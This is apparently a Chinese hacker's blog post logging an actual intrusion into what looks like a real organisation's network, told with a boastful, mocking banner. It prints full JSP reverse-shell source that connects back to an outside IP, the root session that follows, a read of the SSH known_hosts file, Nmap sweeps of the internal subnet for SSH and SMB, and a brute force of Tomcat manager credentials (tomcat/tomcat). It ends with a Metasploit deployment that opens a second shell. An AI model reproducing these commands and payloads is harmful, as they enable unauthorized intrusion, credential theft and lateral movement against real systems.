|
草尼马入侵记- 杜秋娘劝君莫惜金缕衣
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
| (・´ェ`・) ========>我是草拟吗
|
| 我就是传说中的九区四神兽之草尼马 哦YE 刘庆算个P 。
| 九区万岁 。。。。 。。 。。。 。。 。。 。。 。。 。
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------[get shell]-------------------------------------------
root@DIs9Team:/tmp# /opt/framework-3.7.1/msf3/msfpayload java/jsp_shell_reverse_tcp LHOST=222.219.175.71 R > fuck.jsp
root@DIs9Team:/tmp# cat fuck.jsp
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<% class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
try
{
Socket socket = new Socket( "222.219.175.71", 4444 );
Process process = Runtime.getRuntime().exec( "cmd.exe" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
||||||||||||||||||||||||||||||||||| upload jap shell |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
start ---------------------------------------------- M E T A S P L O I T --------------------------------------------
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 222.219
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler
root@DIs9Team:/tmp# wget http://1.1.1.1/fuck.jsp
[*] Command shell session 1 opened ( 222.219.175.71:4444 -> XXXXXXXX:42957)
-bash-3.2# id
uid=0(root) gid=0(root) groups=0(root) context=user_u:system_r:unconfined_t
-------------------------------------------[get shell end]-------------------------------------------
-------------------------------------------[pc info]-------------------------------------------
-bash-3.2# uname -a
Linux opac 2.6.18-194.el5xen #1 SMP Tue Mar 16 22:01:26 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
-bash-3.2# cat /proc/version
Linux version 2.6.18-194.el5xen (mockbuild@x86-005.build.bos.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Tue Mar 16 22:01:26 EDT 2010
-bash-3.2# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1A:64:24:AC:50
inet addr:192.168.1.12 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::21a:64ff:fe24:ac50/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:88546048 errors:0 dropped:0 overruns:0 frame:0
TX packets:77746999 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:51976380102 (48.4 GiB) TX bytes:45171552927 (42.0 GiB)
eth1 Link encap:Ethernet HWaddr 00:1A:64:24:AC:52
inet addr:202.107.212.148 Bcast:202.107.212.159 Mask:255.255.255.240
inet6 addr: fe80::21a:64ff:fe24:ac52/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2188126 errors:0 dropped:0 overruns:0 frame:0
TX packets:2862332 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:506663282 (483.1 MiB) TX bytes:3007535978 (2.8 GiB)
Interrupt:16 Memory:ca000000-ca012800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:130439 errors:0 dropped:0 overruns:0 frame:0
TX packets:130439 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:10367740 (9.8 MiB) TX bytes:10367740 (9.8 MiB)
peth0 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
inet6 addr: fe80::fcff:ffff:feff:ffff/64 Scope:Link
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:88691788 errors:0 dropped:0 overruns:0 frame:0
TX packets:98546280 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:52340205266 (48.7 GiB) TX bytes:46942019318 (43.7 GiB)
Interrupt:21 Memory:ce000000-ce012800
vif0.0 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
inet6 addr: fe80::fcff:ffff:feff:ffff/64 Scope:Link
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:77747014 errors:0 dropped:0 overruns:0 frame:0
TX packets:88546061 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:45171552092 (42.0 GiB) TX bytes:51976384386 (48.4 GiB)
virbr0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
inet6 addr: fe80::200:ff:fe00:0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:544 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:28659 (27.9 KiB)
xenbr0 Link encap:Ethernet HWaddr FE:FF:FF:FF:FF:FF
UP BROADCAST RUNNING NOARP MTU:1500 Metric:1
RX packets:622680 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:47685004 (45.4 MiB) TX bytes:0 (0.0 b)
-bash-3.2# cat /root/.ssh/known_hosts
192.168.1.13 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtZSwDPgZUH17xTKu/Gunjwhrv67Kwhz1xnj3Y1owKVpEkSJVqAGr2/StFyFXPK0fJutYiidL1wm0ul9HjZoXh5szj6jEGNw/nNE++KdXECGlr0EPmIrt3OULjyVIlx3o7ifG4DrEB8avQz35kz4Ii6yPSIm5RT7+xyM+5kOhcQP/CUByTEB+npbhlgQv66ONRY02jAsCxuFsNplz9De4x19ri8lgm/tS13G7u/awi/7dkKgs/mSUAxCOqjtdSRMrwWg6C9wBRsGmwi0Ntdp6TwZ5ha9yFzdV3G2qRSXk0NLSAdUBgUR8/XEcFsiK+MmWcxLf9w0C+6yV3mAlxCEw5w==
-------------------------------------------[pc info end]-------------------------------------------
-------------------------------------------[nmap scan]---------------------------------------------------
-bash-3.2# yum install nmap
-bash-3.2# nmap 192.168.1.1-255 -p 22 > 22.port
-bash-3.2# cat 22.port |grep Nmap scan report for
Nmap scan report for 192.168.1.1
Nmap scan report for 192.168.1.2
Nmap scan report for 192.168.1.4
Nmap scan report for 192.168.1.7
Nmap scan report for 192.168.1.8
Nmap scan report for 192.168.1.10
Nmap scan report for 192.168.1.12
Nmap scan report for 192.168.1.13
Nmap scan report for 192.168.1.14
Nmap scan report for 192.168.1.15
Nmap scan report for 192.168.1.19
Nmap scan report for 192.168.1.20
Nmap scan report for 192.168.1.21
Nmap scan report for 192.168.1.22
Nmap scan report for 192.168.1.23
Nmap scan report for 192.168.1.40
Nmap scan report for 192.168.1.41
Nmap scan report for 192.168.1.42
Nmap scan report for 192.168.1.50
Nmap scan report for 192.168.1.51
Nmap scan report for 192.168.1.61
Nmap scan report for 192.168.1.62
Nmap scan report for 192.168.1.63
Nmap scan report for 192.168.1.64
Nmap scan report for 192.168.1.65
Nmap scan report for 192.168.1.66
Nmap scan report for 192.168.1.67
Nmap scan report for 192.168.1.80
Nmap scan report for 192.168.1.100
Nmap scan report for 192.168.1.103
Nmap scan report for 192.168.1.145
Nmap scan report for 192.168.1.250
Nmap scan report for 192.168.1.251
Nmap scan report for 192.168.1.254
-bash-3.2# nmap 192.168.1.1-255 -p 445 | grep Nmap
Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-16 09:28 CST
Nmap scan report for 192.168.1.1
Nmap scan report for 192.168.1.2
Nmap scan report for 192.168.1.4
Nmap scan report for 192.168.1.7
Nmap scan report for 192.168.1.8
Nmap scan report for 192.168.1.10
Nmap scan report for 192.168.1.12
Nmap scan report for 192.168.1.13
Nmap scan report for 192.168.1.14
Nmap scan report for 192.168.1.15
Nmap scan report for 192.168.1.19
Nmap scan report for 192.168.1.20
Nmap scan report for 192.168.1.21
Nmap scan report for 192.168.1.22
Nmap scan report for 192.168.1.23
Nmap scan report for 192.168.1.40
Nmap scan report for 192.168.1.41
Nmap scan report for 192.168.1.42
Nmap scan report for 192.168.1.50
Nmap scan report for 192.168.1.51
Nmap scan report for 192.168.1.61
Nmap scan report for 192.168.1.62
Nmap scan report for 192.168.1.63
Nmap scan report for 192.168.1.64
Nmap scan report for 192.168.1.65
Nmap scan report for 192.168.1.66
Nmap scan report for 192.168.1.67
Nmap scan report for 192.168.1.80
Nmap scan report for 192.168.1.100
Nmap scan report for 192.168.1.103
Nmap scan report for 192.168.1.145
Nmap scan report for 192.168.1.250
Nmap scan report for 192.168.1.251
Nmap scan report for 192.168.1.254
Nmap done: 255 IP addresses (34 hosts up) scanned in 1.84 seconds
-bash-3.2# nmap --script smb-check-vulns.nse -p445 192.168.1.1-254 > 445.port
-bash-3.2# cat 445.port
Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-16 09:29 CST
Nmap scan report for 192.168.1.1
Host is up (0.00024s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:6E:C7:76:80 (Asustek Computer)
Nmap scan report for 192.168.1.2
Host is up (0.00068s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:0C:29:87:BB:5D (VMware)
Nmap scan report for 192.168.1.4
Host is up (0.00015s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:81:21:35 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.7
Host is up (0.00023s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:23:8D:0F (IBM)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; not Windows, or Windows with disabled browser service (CLEAN); or Windows with crashed browser service (possibly INFECTED).
| | If you know the remote system is Windows, try rebooting it and scanning
| |_ again. (Error NT_STATUS_OBJECT_NAME_NOT_FOUND)
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.8
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1E:4F:3B:F9:64 (Dell)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.10
Host is up (0.00011s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:DD:3D:D4 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.12
Host is up (0.000068s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
Nmap scan report for 192.168.1.13
Host is up (0.00015s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 84:2B:2B:6C:87:4F (Dell)
Nmap scan report for 192.168.1.14
Host is up (0.00023s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:21:5E:53:0B:40 (IBM)
Nmap scan report for 192.168.1.15
Host is up (0.00021s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:10:83:F9:3D:3A (Hewlett-packard Company)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.19
Host is up (0.00016s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:19:21:77:A1:A2 (Elitegroup Computer System Co.)
Nmap scan report for 192.168.1.20
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:90:FB:23:30:90 (Portwell)
Nmap scan report for 192.168.1.21
Host is up (0.00016s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:21:5E:53:0B:CE (IBM)
Nmap scan report for 192.168.1.22
Host is up (0.00018s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:25:11:6D:A6:E3 (Elitegroup Computer System CO.)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE (likely by Conficker)
| Conficker: Likely INFECTED (by Conficker.C or lower)
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.23
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:5E:53:0B:84 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.40
Host is up (0.00020s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:18:F3:03:B0:74 (Asustek Computer)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.41
Host is up (0.00015s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:10:5C:CE:78:03 (Quantum Designs (h.k.))
Nmap scan report for 192.168.1.42
Host is up (0.0034s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:40:05:11:D0:35 (ANI Communications)
Nmap scan report for 192.168.1.50
Host is up (0.00100s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:C0:DD:13:4C:6B (QLogic)
Nmap scan report for 192.168.1.51
Host is up (0.00099s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:C0:DD:13:48:EC (QLogic)
Nmap scan report for 192.168.1.61
Host is up (0.00032s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:5E:C8:5B:3C (IBM)
Host script results:
| smb-check-vulns:
| Conficker: UNKNOWN; got error SMB: Failed to receive bytes after 5 attempts: EOF
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.62
Host is up (0.00012s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:5E:C8:5D:D4 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.63
Host is up (0.00014s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:21:5E:C8:61:E0 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.64
Host is up (0.00013s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:21:5E:C8:69:9A (IBM)
Nmap scan report for 192.168.1.65
Host is up (0.00012s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: E4:1F:13:E5:EC:2C (IBM)
Nmap scan report for 192.168.1.66
Host is up (0.00011s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: E4:1F:13:E5:EC:60 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.67
Host is up (0.00011s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: E4:1F:13:E5:EB:40 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.80
Host is up (0.00032s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 44:37:E6:15:62:B0 (Hon Hai Precision Ind.Co.Ltd)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.100
Host is up (0.00015s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:E0:4C:A3:09:94 (Realtek Semiconductor)
Nmap scan report for 192.168.1.103
Host is up (0.0019s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:40:05:47:34:93 (ANI Communications)
Nmap scan report for 192.168.1.145
Host is up (0.00055s latency).
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:22:15:98:43:61 (Asustek Computer)
Nmap scan report for 192.168.1.250
Host is up (0.00010s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:18:E1:56 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.251
Host is up (0.000093s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:DD:3A:20 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap scan report for 192.168.1.254
Host is up (0.0096s latency).
PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:24:50:50:9A:C1 (Cisco Systems)
Nmap done: 254 IP addresses (34 hosts up) scanned in 53.91 seconds
-------------------------------------------[nmap scan end ]---------------------------------------------------
-------------------------------------------[install metasploit ]---------------------------------------------------
-bash-3.2# yum install -y readline
-bash-3.2# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p22.tar.bz2
-bash-3.2# wget http://rubyforge.org/frs/download.php/38646/rubygems-1.2.0.tgz
-bash-3.2# gem install -v=1.2.2 rails
-bash-3.2# wget http://updates.metasploit.com/data/releases/framework-3.7.1-linux-x64-mini.run
-------------------------------------------[install metasploit end ]---------------------------------------------------
-------------------------------------------[pentest start]-------------------------------------------------------------
Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-16 10:17 CST
Nmap scan report for 192.168.1.250
Host is up (0.00015s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
80/tcp open http
|_http-title: [admin login]
| http-methods: Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-favicon: Apache Tomcat
82/tcp closed xfer
139/tcp open netbios-ssn
445/tcp open microsoft-ds
801/tcp open device
8080/tcp closed http-proxy
8081/tcp open blackice-icecap
MAC Address: 00:14:5E:18:E1:56 (IBM)
Device type: general purpose
Running: Microsoft Windows 2003|XP
OS details: Microsoft Windows Server 2003 SP2, Microsoft Windows XP SP2 or Server 2003 SP2
Network Distance: 1 hop
Host script results:
|_nbstat: NetBIOS name: SYS3650, NetBIOS user: , NetBIOS MAC: 00:14:5e:18:e1:56 (IBM)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows Server 2003 3790 Service Pack 2 (Windows Server 2003 5.2)
| Name: WORKGROUP\SYS3650
|_ System time: 2011-06-16 10:04:43 UTC+8
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
///////////////////////////// sir look Apache Tomcat///////////////////////////////
msf > search tomcat
[*] Searching loaded modules for pattern 'tomcat'...
Auxiliary
=========
Name Rank Description
---- ---- -----------
admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
Exploits
========
Name Rank Description
---- ---- -----------
multi/http/tomcat_mgr_deploy excellent Apache Tomcat Manager Application Deployer Upload and Execute
test/cmdweb normal Command Stager Web Test
msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.250
RHOSTS => 192.168.1.250
msf auxiliary(tomcat_mgr_login) > set RPORT 8080
RPORT => 8080
msf auxiliary(tomcat_mgr_login) > exploit
[*] 192.168.1.250:8080 - Trying username:'admin' with password:''
[-] http://192.168.1.250:8080/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.1.250:8080 - Trying username:'manager' with password:''
[.............................]
[+] 192.168.1.250:8080/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.1.250:8080 - Trying username:'both' with password:'admin'
[-] http://192.168.1.250:8080/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.1.250:8080 - Trying username:'both' with password:'manager'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
///////////////////////////////////////Le user/password : tomcat/tomcat ///////////////////////////////////////////////////////////
msf auxiliary(tomcat_mgr_login) > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.1.250
RHOST => 192.168.1.250
msf exploit(tomcat_mgr_deploy) > set RPORT 8080
RPORT => 8080
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux X86"
[*] Uploading 1661 bytes as UtvTM0INjXw0aXB6s124uRgFcFJFC.war ...
[*] Executing /UtvTM0INjXw0aXB6s124uRgFcFJFC/ZgQyJOeA6f8TWG2.jsp...
[*] Undeploying UtvTM0INjXw0aXB6s124uRgFcFJFC ...
[*] Command shell session 1 opened (1192.168.1.250:49012 -> 192.168.1.12:4444) ----------
------------------
------------------
look
Nmap scan report for 192.168.1.250
Host is up (0.00010s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:14:5E:18:E1:56 (IBM)
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
你 懂 的 ┏┓ ┏┓
┏━━┛┻━━━┛┻━━┓
┃ 王 ┃
┃ ━ ┃
┃ ┳━┛ ┗━┳ ┃
┃ ┃
┃ ┻ ┃
┃ ┃
┗━━┓ ┏━━┛
┃ ┃
┃ ┃
┃ ┗━━━━━┓
┃ ┣┓
┃ ┏┛
┗━┓┓┏━━━┳┓┏━┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛
|
推荐
评论(0条)
